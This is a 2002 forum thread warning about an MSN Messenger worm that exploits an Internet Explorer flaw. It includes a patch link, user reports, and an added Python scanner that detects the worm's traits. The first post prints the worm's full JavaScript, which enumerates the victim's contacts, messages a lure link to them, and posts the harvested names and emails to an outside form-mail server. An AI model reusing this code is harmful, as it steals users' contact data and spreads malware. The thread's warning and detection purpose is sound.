Msn Worm


the_JinX
February 15th, 2002, 06:18 PM
Hey all,


MSN Messenger, the well-known IM software from our friend Bill G., has another vulnerability...

http://www.theregister.co.uk/content/4/24059.html


A relatively benign but effective Internet worm attacked users of Microsoft's MSN Messenger service Wednesday by exploiting a bug in Internet Explorer that was reported last year, but was only recently patched by Microsoft.

The Cool Worm spreads through the Microsoft Internet Explorer Same Origin Policy Violation vulnerability, reported by a security researcher called "ThePull" on December 19th, which went unacknowledged and unrepaired by Microsoft for months.


The worm code looks like this:

<Script>

var msnWin;
var msnList;
var msgStr = "URGENT - Ga hier 'ns heen http://denniz.com/valentijn.html";
//var msgStr = "URGENT - Ga hier 'ns heen http://denniz.com/valentijn (http://denniz.com/valentijn.html)";

function Go(){

msnWin = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
msnWin.resizeTo(1, 1);
msnWin.moveTo(10000, 10000);
msnWin.document.title = "Please Wait...";
msnWin.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1"></object><object classid="clsid:FB7199AB-79BF-11d2-8D94-0000F875C541" id="msnObj2"></object>';
focus();

if (msnWin.msnObj1.localState == 1){
msnWin.msnObj2.autoLogon();
}
Contacts();
Send();
msnWin.close();
document.contents.submit();
}

function Contacts(){
msnList = msnWin.msnObj1.list(0);
document.contents.email.value = msnWin.msnObj1.localLogonName;
document.contents.subject.value = Date();
var msnStr = "
";

for (i=0;i<msnList.count;i++){
if (msnList(i).state >1){
msnStr += "Online Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "
";
}

else{
msnStr += "Offline Contact: " + msnList(i).FriendlyName + ", email: " + msnList(i).LogonName + "
";
}
}
document.contents.contentBox.value = msnStr;
}

function Send(){
for (i=0;i<msnList.count; i++){
if (msnList(i).state >1){
msnList(i).sendText("MIME-Version: 1.0\r\nContent-Type: text/plain; charset=UTF-8\r\n\r\n", msgStr, 0);
}
}
}

</Script>

<body onload="Go()">

<form METHOD="POST" ACTION="http://www.rjdesigns.co.uk/cgi-bin/FormMail.pl" NAME="contents" ID="Form1">
<input type="hidden" name="redirect" value="http://www.xxxxxxxxx.co.uk/cool/go.htm" ID="Hidden1">
<input type="hidden" name="recipient" value="xxxxxxxxxxxxxxxxx@hotmail.com" ID="Hidden5">
<input type="hidden" name="email">
<input type="hidden" name="subject">
<input type="hidden" NAME="contentBox" id="Hidden6">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
</form>
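
A defender's view of the script quoted above, as an added example that is not part of the original post: a static scan that flags pages instantiating the two Messenger ActiveX class IDs shown in the post together with contact-list or send calls. The function name `scan_page`, the rule names, the verdict thresholds and the sample strings are assumptions constructed for this example.

```python
import re

# Class IDs copied from the <object> tags in the worm source quoted in the post.
MESSENGER_CLSIDS = {
    "F3A614DC-ABE0-11D2-A441-00C04F795683",
    "FB7199AB-79BF-11D2-8D94-0000F875C541",
}
CLSID_RE = re.compile(
    r"clsid:\s*\{?([0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12})\}?", re.I)
# Hypothetical rule set: one pattern per behaviour visible in the quoted script.
RULES = {
    "res_url_window": re.compile(r"\.open\s*\(\s*[\"']res://", re.I),
    "offscreen_window": re.compile(
        r"\.(?:moveTo|resizeTo)\s*\(\s*(?:\d{4,}|1\s*,\s*1)\b", re.I),
    "contact_enumeration": re.compile(r"\.list\s*\(\s*0\s*\)|\.LogonName\b", re.I),
    "im_send": re.compile(r"\.sendText\s*\(", re.I),
    "auto_submit_form": re.compile(r"document\.\w+\.submit\s*\(\s*\)", re.I),
}

def scan_page(html: str) -> dict:
    """Return the traits found in an HTML page and a block/review/clean verdict."""
    hits = {name for name, rx in RULES.items() if rx.search(html)}
    if {c.upper() for c in CLSID_RE.findall(html)} & MESSENGER_CLSIDS:
        hits.add("messenger_activex")
    # Assumed threshold: the ActiveX object plus a send or enumerate call is what
    # lets a page act on the contact list; any single trait only merits review.
    capable = "messenger_activex" in hits and bool(
        hits & {"im_send", "contact_enumeration"})
    verdict = "block" if capable else ("review" if hits else "clean")
    return {"verdict": verdict, "hits": sorted(hits)}

# Constructed samples: a trimmed, non-working fragment with the quoted traits,
# a page with only an off-screen window, and an ordinary page.
SAMPLE_WORM_LIKE = '''<script>
w = document.open("res://mshtml.dll/blank.htm", "", "fullscreen=1");
w.moveTo(10000, 10000);
w.document.body.innerHTML = '<object classid="clsid:F3A614DC-ABE0-11d2-A441-00C04F795683" id="msnObj1"></object>';
l = w.msnObj1.list(0);
l(0).sendText("...", "...", 0);
</script>'''
SAMPLE_OFFSCREEN = '<script>window.moveTo(10000, 10000)</script>'
SAMPLE_BENIGN = '<html><body><script>window.open("help.htm")</script></body></html>'

if __name__ == "__main__":
    for page in (SAMPLE_WORM_LIKE, SAMPLE_OFFSCREEN, SAMPLE_BENIGN):
        print(scan_page(page))
```
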

the_JinX
February 15th, 2002, 06:19 PM
the patch is here:

http://www.microsoft.com/windows/ie/downloads/critical/q316059/default.asp

Juridian
February 15th, 2002, 06:20 PM
Yup. Someone tried to hit me with a variant of this.... I've got the code on disk and sent a nice message to Microsoft and the guy's ISP. :P

the_JinX
February 15th, 2002, 06:42 PM
Someone tried to hit me too..

Luckily I was msn-ing under Linux, so no harm done...

www.linux-messenger.tk (the JinXed edition ; )

h0m3r
February 15th, 2002, 11:19 PM
Good thread jinx...

Some ***** sent me the virus too...
thanks for the patch...

the_JinX
February 16th, 2002, 12:04 AM
I'm really sorry for you homer.

I hope there was no real damage done..

But in the future be careful with URLs ppl send u.

gold eagle
February 16th, 2002, 02:04 AM
Agreed - good post. Just for the hell of it I cut and pasted this baby and threw it at my av pkgs - they got it right away. Just testing heheh

Noia
February 16th, 2002, 08:38 PM
That worm was probably written by DHF (Dutch Hack Force) (A bunch of Ass-0, They took down my ISP for 2 weeks once..... )
The worm definitely originated in Holland...... (It contains a message in Dutch)

Ne way's.... I hope someone will do something about the DHF, coz they ain't exactly White-Hatters.

Nice Post though......I don't use MSN, but my friends (and enemies - HAHAHA) do...

Tanx

the_JinX
February 16th, 2002, 08:55 PM
My version (the one I posted) originates from a Casema (cable internet) luser..

I gave all the info in a nice mail to the ISP (casema.nl)

There are also English versions around.

Noia
February 16th, 2002, 09:06 PM
I use Casema, it's an absolute pile of ----
Probably DHF then, they use them for security since Casema can't tell its elbow from its
Arse-0.....

btw: Jinx..... U in Holland??